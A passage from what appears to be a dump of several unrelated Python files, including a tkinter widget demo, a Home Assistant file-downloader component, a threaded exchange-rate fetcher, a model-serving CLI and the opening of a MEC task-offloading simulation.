k2ZOE9y3GOGkSekwvZQn2PaUFmZKZFn2YVnncLxJmOU7uiH\nzddcY4KHDzuTW0ujJrhdI0b41usIqIsOPwkqB/lUbfvVA9iM7XCAS8mgQZYbx7MTJkxYCWfHPa7g\nMXsNxOs1VQpnnOKxiUwewJbghwK7YC3BLYLC1audqbGS87Of2TJdATriSeGaNb51sBWbsR0OcIET\n3OAIV+E6x71NwXNcHFrCfbVwMGgq7rjD3ookIaI7cmDF1S3Sag8HZ850JsZK0bp1rcp2FrRZ9NZb\nTmus/EM2UMYDiSkTLnOMTeaECi1NQuJ09uxZLg4tgavj3K7gOa5ffVdJTw4xnnyiXOOcY07SaBrk\nLfAv2Pqtb5lGNeYnQS0zNl57bXPZrmJjv34mePy4095aGjT8/37rrc1lubnJv9iM7eWa34IHDti8\nBW5wdFzb7S2eMDsP5lccmzdvrkFRYMUKe/WDBtiQYpbnlhIp9kathT7VGscPG/r3tzeZuhPo3CTd\nftggWyiDbdiIrdYpQuCVV6xT4JScnMwvVBK6nIjgQbb3hnP1s6CgwCqs+ulP7UUcZnVSahImDGAc\nJwrS8p4CNmEbNmIrNgc0P8HhjFbSo0eP5jrrLY5jh3uLJyy96WZjH3744U3M4KGqKhP4/vft9S2v\n50CSLoshvKGLCWzAFmzyegq2Bu6914RkPxxmzJihQNX5C9CeNF+ZnzNnzmE8HiovN4G77rJ345jh\nGb9EJQzi2JMLxxcDmQI2YAuZLbZhI7Zic1BzoDgwr3T5yrwnjEH7I4slS5bk0UBQOUC13gK3NLnG\nxbEnCzmOPtmmIGdg+xDwuadBm7SNDdiCTdiGjdiKzc8995yiddJ9jktC80o8YQwSztjZmkoD1jnn\nz5ug5hwuGtNduXtCAkWYJGKxhODuXk+CNmiLNmkbG7AFm4KaU4Ia+i2c0u0/y0FQxM45iqfQJatc\noyElSyGFci4c86ZIotg+9CZB3ibdvLvAJjY6cQht0BZt0jY2hBSSQ4qg2IaNbvjQU7AdDt3mFE+8\nnkNXvJtJjBneOkd5To2SQO7+YxwXC70tCxIz781CiPS8M/CcgS50ops2aIs2abuG5E15Cjbl5+d7\nE22P/vSvpTA+mbzGEsrJCTAkyO8FXn7Z1Godwi9A6M7kDqxNmKDZ4aPL88bZWoQkoFd5PQt4/+89\n934USl3SenShE920QVu0SdvYgC2bNm2qcSG55Y9FL4gwoxPuhpME8gOp4uJiw8IzqGVETWqqqdfi\nk98Q8Sa9SZo5gGsYhFKGALtqLDFY03hpP5/5jmeUoSx1qOtNquhEN23QVrXapG1skC3ez4vJU7Cx\ny9EnUSEHIEGyP0jnBwssyvjxAkZWK0SGV6409QqXDcnJ9ldotQI/mfF+AAFR7t+yhiHnAHzmO57Z\nHESgDnXR0dC7t6mfNMnqrq6osG3Rptouc2ufi/qDdE8Ys3RT3oz9EwbczV+1alUZP++1DqIXnThh\natLSTP306aZxyBAT6dXL/pbR7yd8HnhGGVuWe3Kqiw50eXr5gRltua2DL8yfMGgp3sTM8p29jUns\nirFNunXr1kYyTo+MdVRenr2oWKuIVjdvnql74glT/4tfWPCZ73gWXr/elm1Zl0iDzgULFhxwO29s\nMtEmbff4BNtZ8RzEbpj3Z1Ie4HLx3Llzs9LT06sOHTpkybUk2xYoSx3qosPt5rNxfUn8mZRowUi6\nM5vL7LxzLMGZDQdaMzkK5Zx41qxZH8+fP3+vMuqcF1544TjgM9/xjDLu2JQTQuqiA12X3B/W8RMM\nJzJwkMUpH+GTZKuzf4oJXZesM+IJhADRgrfNECAbhTBRBPCZ73hGGcp69S6QJCX9E1J0RJklhuMb\nAAAAAElFTkSuQmCC\n',
}
return items
PhotoData = _GetPhotoByteData()
q = queue.Queue()
class HTMLViewer(HTMLLabel):
def __init__(self, master, **kwargs):
self.master = master
super().__init__(master=master, **kwargs)
# def HandlePress(self, event: tkEvent): TkinterEvent.Debug(event)
# def HandleRelease(self, event: tkEvent): TkinterEvent.Debug(event)
# def HandleFocusIn(self, event: tkEvent): TkinterEvent.Debug(event)
# def HandleFocusOut(self, event: tkEvent): TkinterEvent.Debug(event)
d = ItemCollection.Parse([
{
"ID": "G1",
"Name": "G Item 1",
"Children": [
{
"ID": "G1.O1",
"Name": "G1.O1 Item 1",
"Children": [
{
"ID": "G1.O1.I1",
"Name": "G1.O1.I1 Item 1",
},
{
"ID": "G1.O1.I2",
"Name": "G1.O1.I2 Item 2",
},
],
},
{
"ID": "G1.O2",
"Name": "G1.O2 Item 2",
"Children": [
{
"ID": "G1.O2.I1",
"Name": "G1.O2.I1 Item 1",
},
{
"ID": "G1.O2.I2",
"Name": "G1.O2.I2 Item 2",
},
],
},
],
},
{
"ID": "G2",
"Name": "G Item 2",
"Children": [
{
"ID": "G2.O1",
"Name": "G2.O1 Item 1",
"Children": [
{
"ID": "G2.O1.I1",
"Name": "G2.O1.I1 Item 1",
},
{
"ID": "G2.O1.I2",
"Name": "G2.O1.I2 Item 2",
},
],
},
{
"ID": "G2.O2",
"Name": "G2.O2 Item 2",
"Children": [
{
"ID": "G2.O2.I1",
"Name": "G2.O2.I1 Item 1",
},
],
},
{
"ID": "G2.O3",
"Name": "G2.O3 Item 3",
},
],
},
])
class Root(tkRoot):
# sets up Tkinter and creates the other windows and places them accordingly.
def __init__(self):
super().__init__(Screen_Width=800, Screen_Height=480, x=200, y=200)
self.w: List[tk.Widget] = []
self.home = HomeWindow(master=self).PlaceFull()
# self.html = HTMLScrolledText(master=self).PlaceFull()
# self.html.txt = 'Test'
# self.html.hide()
#
# self.other = Widgets.Label(master=self, text='PlaceHodler').PlaceRelative(relx=0.5, rely=0, relwidth=.5, relheight=1)
#
# self.t = HTMLViewer(master=self).PlaceRelative(relx=0, rely=0, relwidth=.5, relheight=1)
# self.t.txt = 'events'
# self.Bind(Bindings.Key, self.HandlePress)
# self.Bind(Bindings.ButtonPress, self.HandlePress)
# self.Bind(Bindings.ButtonRelease, self.HandlePress)
self.nb = NotebookThemed(master=self, height=30).PlaceFull()
self.style.configure('Treeview', rowheight=40, font="-family {Segoe UI Black} -size 12 -slant roman -underline 0 -overstrike 0")
self.p2 = TreeViewHolderThemed(master=self.nb, backgroundColor='white').PlaceFull()
self.nb.Add(self.p2, title='page 1')
self.TreeView = self.p2.TreeView
self.TreeView.SetItems(d)
self.TreeView.SetCommand(self.OnClick)
bold_font = "-family {Segoe UI Black} -size 16 -weight bold -slant roman -underline 0 -overstrike 0"
self.TreeView.SetTags(sel=dict(foreground='green', font=bold_font))
self.p1 = Label(master=self.nb, text='page 1').PlaceFull()
self.nb.Add(self.p1, title='page 2')
# AutoStartTargetedThread(target=self.__run__)
# noinspection PyUnusedLocal
def OnClick(self, event: tk.Event = None):
self.TreeView.OnSelectRow(event)
@staticmethod
def HandlePress(event: tkEvent): TkinterEvent.Debug(event)
def Run(self): self.mainloop()
def __run__(self):
while True:
cls = random.choice([Window1, Window2, Window3, LabelWindow])
self.home.Add(cls)
# DebugWidget(self.home, root=self, Message='__run__')
sleep(2)
# self.after(1000, self.__run__)
class HomeWindow(Frame):
def __init__(self, master: Root):
self.root = master
super().__init__(master)
self.w: List[Widgets.Button] = []
def Add(self, cls: Union[Frame, LabelFrame]):
assert (callable(cls))
w = cls(master=self.root).PlaceFull()
b = Widgets.Button(master=self, text=f'{w.__class__.__name__} [ {len(self.root.w)} ]')
b.SetCommand(lambda: self.closeWindow(w))
i = len(self.root.w)
self.Grid_RowConfigure(i, weight=1)
self.Grid_ColumnConfigure(0, weight=1)
b.Grid(column=0, row=i)
w.hide()
self.root.w.append(w)
def closeWindow(self, w: Union[Frame, LabelFrame]):
w.show()
self.root.home.hide()
class BaseWindow(Frame):
button: Widgets.Button
CreateWidgets: callable
def __init__(self, master: Root):
self.master = master
super().__init__(master)
self.CreateWidgets()
def exit(self):
self.hide()
self.master.home.show()
def OnAppearing(self):
self.button.SetPhoto(PhotoData['exit'])
class Window1(BaseWindow):
def CreateWidgets(self):
self.button = Widgets.Button(master=self, text="button 1").SetCommand(self.exit).Place(relx=0.0, rely=0.0, relheight=1.0, relwidth=1.0)
class Window2(BaseWindow):
def CreateWidgets(self):
self.button = Widgets.Button(master=self, text="button 2").SetCommand(self.exit).Place(relx=0.0, rely=0.0, relheight=1.0, relwidth=1.0)
class Window3(BaseWindow):
nested: Window2
def CreateWidgets(self):
self.button = Widgets.Button(master=self, text="button 3").SetCommand(self.exit).Place(relx=0.0, rely=0.0, relheight=1.0, relwidth=0.5)
self.nested = LabelWindow(master=self).Place(relx=0.5, rely=0.0, relheight=1.0, relwidth=0.5)
class LabelWindow(LabelFrame):
button: Widgets.Button
CreateWidgets: callable
    def __init__(self, master: Union[Root, BaseWindow]):
self.master = master
super().__init__(master, text=str(self.__class__.__name__))
self.button = Widgets.Button(master=self, text="button 4").SetCommand(self.exit).Place(relx=0.0, rely=0.0, relheight=1.0, relwidth=0.5)
def exit(self):
self.hide()
self.master.home.show()
def test():
""" https://stackoverflow.com/questions/7878730/ttk-treeview-alternate-row-colors """
from random import choice
colors = ["red", "green", "black", "blue", "white", "yellow", "orange", "pink", "grey", "purple", "brown"]
def recolor():
for child in tree.TreeView.get_children():
picked = choice(colors)
tree.TreeView.item(child, tags=(picked,), values=(picked,))
for color in colors:
tree.TreeView.tag_configure(color, background=color)
tree.TreeView.tag_configure("red", background="red")
root = tkRoot(800, 480, 200, 200)
print('tkinter.info.patchlevel', root.tk.call('info', 'patchlevel'))
style = Style(root)
style.configure("Treeview", foreground="yellow", background="black", fieldbackground="green")
frame = Frame(root).PlaceFull().SetID(1234)
print(frame.__name__)
print(str(frame))
print(repr(frame))
tree = TreeViewHolderThemed(frame, backgroundColor='white')
tree.TreeView["columns"] = ("one", "two", "three")
tree.TreeView.column("#0", width=100, minwidth=30, stretch=Bools.NO)
tree.TreeView.column("one", width=120, minwidth=30, stretch=Bools.NO)
tree.TreeView.heading("#0", text="0", anchor=AnchorAndSticky.West)
tree.TreeView.heading("one", text="1", anchor=AnchorAndSticky.West)
for i in range(30): tree.TreeView.insert("", i, text=f"Elem {i} ", values="none")
tree.Pack(side=Side.top, fill=Fill.both, expand=True)
Button(frame, text="Change").SetCommand(recolor).Pack(fill=tk.X)
root.mainloop()
def test1():
Root().Run()
def run_all():
# from TkinterExtensions.Widgets.KeyBoard import KeyBaordTestFrame
# KeyBaordTestFrame.test()
# test()
# test1()
pass
if __name__ == '__main__':
run_all()
|
downloader.py
|
"""
Support for functionality to download files.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/downloader/
"""
import logging
import os
import re
import threading
import requests
import voluptuous as vol
from homeassistant.helpers import validate_config
import homeassistant.helpers.config_validation as cv
from homeassistant.util import sanitize_filename
DOMAIN = "downloader"
SERVICE_DOWNLOAD_FILE = "download_file"
ATTR_URL = "url"
ATTR_SUBDIR = "subdir"
SERVICE_DOWNLOAD_FILE_SCHEMA = vol.Schema({
# pylint: disable=no-value-for-parameter
vol.Required(ATTR_URL): vol.Url(),
vol.Optional(ATTR_SUBDIR): cv.string,
})
CONF_DOWNLOAD_DIR = 'download_dir'
# pylint: disable=too-many-branches
def setup(hass, config):
"""Listen for download events to download files."""
logger = logging.getLogger(__name__)
if not validate_config(config, {DOMAIN: [CONF_DOWNLOAD_DIR]}, logger):
return False
download_path = config[DOMAIN][CONF_DOWNLOAD_DIR]
# If path is relative, we assume relative to HASS config dir
if not os.path.isabs(download_path):
download_path = hass.config.path(download_path)
if not os.path.isdir(download_path):
logger.error(
"Download path %s does not exist. File Downloader not active.",
download_path)
return False
def download_file(service):
"""Start thread to download file specified in the URL."""
def do_download():
"""Download the file."""
try:
url = service.data[ATTR_URL]
subdir = service.data.get(ATTR_SUBDIR)
if subdir:
subdir = sanitize_filename(subdir)
final_path = None
req = requests.get(url, stream=True, timeout=10)
if req.status_code == 200:
filename = None
if 'content-disposition' in req.headers:
match = re.findall(r"filename=(\S+)",
req.headers['content-disposition'])
if len(match) > 0:
filename = match[0].strip("'\" ")
if not filename:
filename = os.path.basename(
url).strip()
if not filename:
filename = "ha_download"
                    # Remove characters that could be used to manipulate the path
filename = sanitize_filename(filename)
# Do we want to download to subdir, create if needed
if subdir:
subdir_path = os.path.join(download_path, subdir)
                        # Ensure the subdir exists
if not os.path.isdir(subdir_path):
os.makedirs(subdir_path)
final_path = os.path.join(subdir_path, filename)
else:
final_path = os.path.join(download_path, filename)
path, ext = os.path.splitext(final_path)
                    # If the file exists, append a number.
                    # We test filename, filename_2, ...
tries = 1
final_path = path + ext
while os.path.isfile(final_path):
tries += 1
final_path = "{}_{}.{}".format(path, tries, ext)
logger.info("%s -> %s", url, final_path)
with open(final_path, 'wb') as fil:
for chunk in req.iter_content(1024):
fil.write(chunk)
logger.info("Downloading of %s done", url)
except requests.exceptions.ConnectionError:
logger.exception("ConnectionError occured for %s", url)
# Remove file if we started downloading but failed
if final_path and os.path.isfile(final_path):
os.remove(final_path)
threading.Thread(target=do_download).start()
hass.services.register(DOMAIN, SERVICE_DOWNLOAD_FILE, download_file,
schema=SERVICE_DOWNLOAD_FILE_SCHEMA)
return True
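# Illustrative sketch (hedged, not part of the upstream component): the same
# collision-avoiding naming used in do_download() above, pulled out as a
# standalone helper so it can be exercised without Home Assistant. The helper
# name _example_unique_path and the injectable `exists` check are assumptions.
def _example_unique_path(directory, filename, exists=os.path.isfile):
    """Return filename, then filename_2, filename_3, ... until nothing exists."""
    path, ext = os.path.splitext(os.path.join(directory, filename))
    tries = 1
    candidate = path + ext
    while exists(candidate):
        tries += 1
        candidate = "{}_{}{}".format(path, tries, ext)
    return candidate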
|
get_rates.py
|
""" main module """
from concurrent.futures import ThreadPoolExecutor
from datetime import date
from requests import request
import time
import threading
from rates_demo.business_days import business_days
def get_rates() -> None:
""" get the rates """
start_date = date(2021, 1, 1)
end_date = date(2021, 3, 31)
rate_responses: list[str] = []
for business_day in business_days(start_date, end_date):
rate_url = "".join([
"http://127.0.0.1:5000/api/",
str(business_day),
"?base=USD&symbols=EUR"])
response = request("GET", rate_url)
rate_responses.append(response.text)
# for rate_response in rate_responses:
# print(rate_response)
print(f"num of responses: {len(rate_responses)}")
print(rate_responses)
def get_rate_task(business_day: date, responses: list[str]) -> None:
""" get rate task function """
rate_url = "".join([
"http://127.0.0.1:5000/api/",
str(business_day),
"?base=USD&symbols=EUR"])
response = request("GET", rate_url)
responses.append(response.text)
def get_rates_threaded() -> None:
""" get the rates """
start_date = date(2021, 1, 1)
end_date = date(2021, 3, 31)
rate_responses: list[str] = []
threads: list[threading.Thread] = []
for business_day in business_days(start_date, end_date):
a_thread = threading.Thread(
target=get_rate_task, args=(business_day,rate_responses))
a_thread.start()
threads.append(a_thread)
for a_thread in threads:
a_thread.join()
print(f"num of responses: {len(rate_responses)}")
print(rate_responses)
# threadpool version
# def get_rates_threaded() -> None:
# """ get the rates """
# start_date = date(2021, 1, 1)
# end_date = date(2021, 3, 31)
# rate_responses: list[str] = []
# with ThreadPoolExecutor() as executor:
# rate_responses = list(executor.map(
# get_rate_task,
# [ business_day for business_day
# in business_days(start_date, end_date) ]))
# print(f"num of responses: {len(rate_responses)}")
# print(rate_responses)
# def get_rates_threaded_gen() -> None:
# """ get the rates """
# start_date = date(2021, 1, 1)
# end_date = date(2021, 3, 31)
# rate_responses: list[str] = []
# with ThreadPoolExecutor() as executor:
# executor.map(
# lambda params: get_rate_task(*params),
# ( (business_day, rate_responses) for business_day
# in business_days(start_date, end_date) ))
# print(f"num of responses: {len(rate_responses)}")
# if __name__ == "__main__":
# start = time.time()
# get_rates()
# print(f"original time elapsed: {time.time() - start}")
# start = time.time()
# get_rates_threaded()
# print(f"threaded time elapsed: {time.time() - start}")
# start = time.time()
# get_rates_threaded_gen()
# print(f"threaded time elapsed: {time.time() - start}")
|
main.py
|
#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import os.path
import sys
import tempfile
import tfi
import tfi.driver
import tfi.driverconfig
from tfi.resolve.model import _detect_model_file_kind, _model_module_for_kind, _load_model_from_path_fn
from tfi.cli import resolve as _resolve_model
from tfi.tensor.codec import encode as _tfi_tensor_codec_encode
from tfi.format.iterm2 import imgcat as _tfi_format_iterm2_imgcat
def _detect_model_object_kind(model):
klass = model if isinstance(model, type) else type(model)
for c in klass.mro():
if c.__name__ != "Model":
continue
if c.__module__ == "tfi.driver.pytorch":
return "pytorch"
if c.__module__ == "tfi.driver.prophet":
return "prophet"
if c.__module__ == "tfi.driver.tf":
return "tensorflow"
if c.__module__ == "tfi.driver.msp":
return "msp"
if c.__module__ == "tfi.driver.spacy":
return "spacy"
raise Exception("Unknown model type %s" % klass)
def _model_export(path, model):
kind = _detect_model_object_kind(model)
mod = _model_module_for_kind(kind)
return mod.export(path, model)
def _model_publish(f):
from tfi.publish import publish as _publish
kind = _detect_model_file_kind(f)
_publish(kind, f)
class ModelSpecifier(argparse.Action):
def __init__(self,
option_strings,
dest,
**kwargs):
super(ModelSpecifier, self).__init__(
option_strings=option_strings,
dest=dest,
**kwargs)
def __call__(self, parser, namespace, values, option_string=None):
if values is None:
setattr(namespace, self.dest, None)
return
if values:
leading_value, *rest = values
else:
leading_value = None
rest = []
resolution = _resolve_model(leading_value, rest)
setattr(namespace, self.dest, resolution['model'])
setattr(namespace, "%s_module_fn" % self.dest, resolution.get('module_fn', lambda x: None))
setattr(namespace, "%s_can_refresh" % self.dest, resolution.get('can_refresh', None))
setattr(namespace, "%s_refresh_fn" % self.dest, resolution.get('refresh_fn', None))
setattr(namespace, "%s_method_fn" % self.dest, resolution['model_method_fn'])
setattr(namespace, "%s_source" % self.dest, resolution.get('source', None))
setattr(namespace, "%s_source_sha1hex" % self.dest, resolution.get('source_sha1hex', None))
setattr(namespace, "%s_via_python" % self.dest, resolution.get('via_python', None))
setattr(namespace, "%s_raw" % self.dest, resolution.get('leading_value', None))
parser = argparse.ArgumentParser(prog='tfi', add_help=False)
parser.add_argument('--serve', default=False, action='store_true', help='Start REST API on given port')
parser.add_argument('--tracing-host', type=str, default=os.environ.get('JAEGER_HOST', None), help='Jaeger host to submit traces to while serving')
parser.add_argument('--tracing-tags', type=str, default=os.environ.get('JAEGER_TAGS', ''), help='Jaeger tags to include in traces to while serving')
parser.add_argument('--internal-config', type=str, default=os.environ.get("TFI_INTERNAL_CONFIG", ""), help='For internal use.')
parser.add_argument('--publish', default=False, action='store_true', help='Publish model')
parser.add_argument('--bind', type=str, help='Set address:port to serve model on. Default behavior is 127.0.0.1:5000 if available, otherwise 127.0.0.1:0')
parser.add_argument('--bind-default', type=str, default='127.0.0.1:5000')
parser.add_argument('--export', type=str, help='path to export to')
parser.add_argument('--export-doc', type=str, help='path to export doc to')
parser.add_argument('--watch', default=False, action='store_true', help='Watch given model and reload when it changes')
parser.add_argument('--interactive', '-i', default=None, action='store_true', help='Start interactive session')
parser.add_argument('--tf-tensorboard-bind-default', type=str, default='127.0.0.1:6007')
parser.add_argument('--tf-tensorboard-bind', type=str, help='Set address:port to serve TensorBoard on. Default behavior is 127.0.0.1:6007 if available, otherwise 127.0.0.1:0')
parser.add_argument('--tf-logdir',
default=os.path.expanduser('~/.tfi/tf/log/%F_%H-%M-%S/%04i'),
                    help='Set TensorFlow log dir to write to. Renders any %% placeholders with strftime, runs TensorBoard from parent dir. %%04i is replaced by a 0-padded run_id count')
parser.add_argument('specifier', type=str, default=None, nargs=argparse.REMAINDER, action=ModelSpecifier, help='fully qualified class name to instantiate')
# TODO(adamb)
# And let's add basic text --doc output.
# Then we'll add support for training a model locally ... (which?)
# Then we'll add support for training a model ELSEWHERE.
def run(argns, remaining_args):
model = None
module = None
exporting = argns.export is not None or argns.export_doc is not None
serving = argns.serve is not False
publishing = argns.publish is not False
batch = False
if argns.interactive is None:
argns.interactive = not batch and not exporting and not serving and not publishing
def tf_make_logdir_fn(datetime):
import re
base_logdir = datetime.strftime(argns.tf_logdir)
def logdir_fn(run_id=None):
if run_id is None:
                return re.sub(r'(%\d*)i', '', base_logdir)
            base_logdir_formatstr = re.sub(r'(%\d*)i', r'\1d', base_logdir)
return base_logdir_formatstr % run_id
return logdir_fn
import tfi
import tfi.driverconfig
tfi.driverconfig.tf.make_logdir_fn = tf_make_logdir_fn
if argns.specifier:
model = argns.specifier
module = argns.specifier_module_fn()
if argns.specifier_method_fn:
result = argns.specifier_method_fn()
accept_mimetypes = {"image/png": _tfi_format_iterm2_imgcat, "text/plain": lambda x: x}
result_val = _tfi_tensor_codec_encode(accept_mimetypes, result)
if result_val is None:
result_val = result
result_str = '%r\n' % (result_val, )
print(result_str)
batch = True
internal_config = argns.internal_config or (model and _detect_model_object_kind(model))
if internal_config == 'tensorflow':
import tensorflow
tensorboard = internal_config == 'tensorflow' and argns.interactive
if tensorboard:
import tfi.driver.tf.tensorboard_server
import threading
tb_logdir = argns.tf_logdir
while '%' in tb_logdir:
tb_logdir = os.path.dirname(tb_logdir)
if argns.tf_tensorboard_bind:
tb_host, tb_port = argns.tf_tensorboard_bind.split(':', 1)
tb_port = int(tb_port)
else:
tb_host, tb_port = argns.tf_tensorboard_bind_default.split(':', 1)
tb_port = int(tb_port)
import socket
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
try:
s.bind((tb_host, tb_port))
except socket.error as e:
if e.errno == 98:
tb_port = 0
# Use some fancy footwork to delay continuing until TensorBoard has started.
tb_cv = threading.Condition()
def tb_run():
def on_ready_fn(url):
if url:
print('TensorBoard at %s now serving %s' % (url, tb_logdir))
sys.stdout.flush()
with tb_cv:
tb_cv.notify_all()
tfi.driver.tf.tensorboard_server.main(tb_logdir, tb_host=tb_host, tb_port=tb_port, tb_on_ready_fn=on_ready_fn)
with tb_cv:
tb_thread = threading.Thread(target=tb_run, daemon=True)
tb_thread.start()
tb_cv.wait()
if internal_config == 'spacy':
import tfi.driver.spacy
if serving:
segment_js = """
<script>
!function(){var analytics=window.analytics=window.analytics||[];if(!analytics.initialize)if(analytics.invoked)window.console&&console.error&&console.error("Segment snippet included twice.");else{analytics.invoked=!0;analytics.methods=["trackSubmit","trackClick","trackLink","trackForm","pageview","identify","reset","group","track","ready","alias","debug","page","once","off","on"];analytics.factory=function(t){return function(){var e=Array.prototype.slice.call(arguments);e.unshift(t);analytics.push(e);return analytics}};for(var t=0;t<analytics.methods.length;t++){var e=analytics.methods[t];analytics[e]=analytics.factory(e)}analytics.load=function(t){var e=document.createElement("script");e.type="text/javascript";e.async=!0;e.src=("https:"===document.location.protocol?"https://":"http://")+"cdn.segment.com/analytics.js/v1/"+t+"/analytics.min.js";var n=document.getElementsByTagName("script")[0];n.parentNode.insertBefore(e,n)};analytics.SNIPPET_VERSION="4.0.0";
analytics.load("GaappI2dkNZV4PLVdiJ8pHQ7Hofbf6Vz");
analytics.page();
}}();
</script>
"""
segment_js = ""
def on_bind(url):
print("Serving at %s" % url)
tracing_tags = {}
if argns.tracing_tags:
for tag_entry in argns.tracing_tags.split(' '):
tag_k, tag_v = tag_entry.split('=', 1)
tracing_tags[tag_k] = tag_v
if argns.bind:
host, port = argns.bind.split(':')
port = int(port)
else:
host, initial_port = argns.bind_default.split(':')
initial_port = int(initial_port)
port = 0
for possible_port in range(initial_port, initial_port + 32):
import socket
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
try:
s.bind((host, possible_port))
port = possible_port
break
except socket.error as e:
if e.errno == 98 or e.errno == 48:
pass
if model is None:
from tfi.serve import run_deferred as serve_deferred
serve_deferred(
host=host, port=port, on_bind=on_bind,
load_model_from_path_fn=_load_model_from_path_fn,
extra_scripts=segment_js,
jaeger_host=argns.tracing_host,
jaeger_tags=tracing_tags)
else:
from tfi.serve import run as serve
def model_file_fn():
if argns.specifier_source and not argns.specifier_via_python:
return argns.specifier_source
with tempfile.NamedTemporaryFile(mode='rb', delete=False) as f:
print("Exporting ...", end='', flush=True)
_model_export(f.name, model)
print(" done", flush=True)
return f.name
serve(model,
host=host,
port=port,
on_bind=on_bind,
extra_scripts=segment_js,
jaeger_host=argns.tracing_host,
jaeger_tags=tracing_tags,
model_file_fn=model_file_fn)
if argns.watch:
if not argns.specifier_can_refresh:
print("WARN: Can't watch unrefreshable model.")
else:
import tfi.watch
ar = tfi.watch.AutoRefresher()
def do_refresh():
def refresh_progress(model, ix, total):
print("Refreshing %d/%d: %s" % (ix, total, model))
argns.specifier_refresh_fn(refresh_progress)
ar.watch(argns.specifier_source, argns.specifier_source_sha1hex, do_refresh)
ar.start()
if argns.interactive:
from tfi.repl import run as run_repl
run_repl(
globals=globals(),
locals=None,
history_filename=os.path.expanduser('~/.tfihistory'),
model=model,
module=module)
if argns.export_doc:
tfi.doc.save(argns.export_doc, model)
if argns.export:
if argns.specifier_source and not argns.specifier_via_python:
import shutil
shutil.copyfile(argns.specifier_source, argns.export)
else:
_model_export(argns.export, model)
if argns.publish:
if argns.specifier_source and not argns.specifier_via_python:
with open(argns.specifier_source, 'rb') as f:
# TODO(adamb) Should actually autodetect which environment to use.
url = _model_publish(f)
else:
with tempfile.NamedTemporaryFile(mode='rb') as f:
# TODO(adamb) Should actually autodetect which environment to use.
print("Exporting ...", end='', flush=True)
_model_export(f.name, model)
print(" done", flush=True)
url = _model_publish(f)
print(url)
def cli(args):
argns, remaining_args = parser.parse_known_args(args)
argns.load_model_from_path_fn = _load_model_from_path_fn
run(argns, remaining_args)
def main():
cli(sys.argv[1:])
if __name__ == '__main__':
main()
|
algo_six.py
|
from functools import reduce
import numpy as np
import random as r
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
import argparse
import pickle
hosts = {} # {hostname: ip}
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}]  # [[task_list], {wait_time}] => records tasks re-offloaded to this MEC to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
thread_record = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
received_time = []
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
shared_resource_lock = threading.Lock()
t_track = 1
def ping(host):
cmd = [f'ping -c 1 {host}']
output = str(sp.check_output(cmd, shell=True), 'utf-8').split('\n')
try:
value = float(output[-2].split('=')[-1].split('/')[0])
except ValueError:
value = None
return value
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(my_algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
